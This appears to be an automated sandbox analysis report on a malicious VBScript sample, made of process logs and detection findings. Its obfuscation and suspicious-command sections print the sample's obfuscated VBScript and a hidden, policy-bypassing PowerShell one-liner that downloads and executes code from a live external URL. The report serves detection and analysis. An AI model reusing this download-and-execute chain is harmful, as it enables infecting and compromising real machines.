Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(""GERG45rg77875g6879568676567y6ERgErgeRgErG4564e6r54654ER54ger654g65RGE54rErGergergErui405erg640e4r6eTRHeRgeRgErg41056465ERGerGeRGErg456456RTHJTYJTYERgEgergERthrt5456e4r6ERGErERTHetrherthrhrtHr415rt56h456rtERgErgeRgErG4564e6r54654RURTYRETGHRTRGER5454635ergergErgerGeRgerGer54rt56h4t56r45yj6eRtghErgErg5465er4g65e46r5g6eeRtghErgErg5465er4g65e46r5g6e"", ""GERG45rg77875g6879568676567y6"", ""w""), ""ERgErgeRgErG4564e6r54654"", ""s""), ""ER54ger654g65RGE54r"", ""c""), ""ErGergergErui405erg640e4r6"", ""r""), ""eTRHeRgeRgErg41056465"", ""i""), ""ERGerGeRGErg456456RTHJTYJTY"", ""p""), ""ERgEgergERthrt5456e4r6ERGEr"", ""t""), ""ERTHetrherthrhrtHr415rt56h456rt"", "".""), ""RURTYRETGHRTRGER5454635ergerg"", ""h""), ""ErgerGeRgerGer54rt56h4t56r45yj6"", ""e""), ""eRtghErgErg5465er4g65e46r5g6e"", ""l""))" & _vbCrLf & "Shorba = (""POWeRS"")" & _vbCrLf & "SpAsito.Run((Shorba)+""HeLL.eXe -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);""), CONSOLE_HIDE, CMD_WAIT" & _vbCrLf & "Set refresh = Nothing" & _vbCrLf & "Set befresh = Nothing" & _vbCrLf & "Set sroor = Nothing" & _vbCrLf & "Set mroor = Nothing" & _vbCrLf & "Set thoor = Nothing" & _vbCrLf & "Set U = Nothing"on error resume nextxxxxxxxxxxxxxxxxxxxxxxxjljdmeworgafnyvfeius = replace(jljdmeworgafnyvfeius,"","")xxxxxxxxxxxxxxxxxxxxxxxjljdmeworgafnyvfeius = replace(jljdmeworgafnyvfeius,"", "")xxxxxxxxxxxxxxxxxxxxxxxexecute jljdmeworgafnyvfeiusOn Error Resume NextSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet note = NothingSet style = NothingSet ontherun = NothingSet SpAsito = CreateObject(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace("GERG45rg77875g6879568676567y6ERgErgeRgErG4564e6r54654ER54ger654g65RGE54rErGergergErui405erg640e4r6eTRHeRgeRgErg41056465ERGerGeRGErg456456RTHJTYJTYERgEgergERthrt5456e4r6ERGErERTHetrherthrhrtHr415rt56h456rtERgErgeRgErG4564e6r54654RURTYRETGHRTRGER5454635ergergErgerGeRgerGer54rt56h4t56r45yj6eRtghErgErg5465er4g65e46r5g6eeRtghErgErg5465er4g65e46r5g6e", "GERG45rg77875g6879568676567y6", "w"), "ERgErgeRgErG4564e6r54654", "s"), "ER54ger654g65RGE54r", "c"), "ErGergergErui405erg640e4r6", "r"), "eTRHeRgeRgErg41056465", "i"), "ERGerGeRGErg456456RTHJTYJTY", "p"), "ERgEgergERthrt5456e4r6ERGEr", "t"), "ERTHetrherthrhrtHr415rt56h456rt", "."), "RURTYRETGHRTRGER5454635ergerg", "h"), "ErgerGeRgerGer54rt56h4t56r45yj6", "e"), "eRtghErgErg5465er4g65e46r5g6e", "l"))Shorba = ("POWeRS")SpAsito.Run((
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886B1FB95 pushad ; iretd 3_2_00007FF886B1FB97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886B1D2A5 pushad ; iretd 3_2_00007FF886B1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4789E push eax; retf 3_2_00007FF886C478AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C31039 pushad ; iretd 3_2_00007FF886C3103A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4786E pushad ; retf 3_2_00007FF886C4789D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C3785E push eax; iretd 3_2_00007FF886C3786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C3782E pushad ; iretd 3_2_00007FF886C3785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C45D62 push ss; iretd 3_2_00007FF886C45D67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C302FD push ds; iretd 3_2_00007FF886C303E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C30CC4 push ds; iretd 3_2_00007FF886C30CCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4845E push eax; ret 3_2_00007FF886C4846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C47C5E push eax; retf 3_2_00007FF886C47C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4842E pushad ; ret 3_2_00007FF886C4845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C47C2E pushad ; retf 3_2_00007FF886C47C5D

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
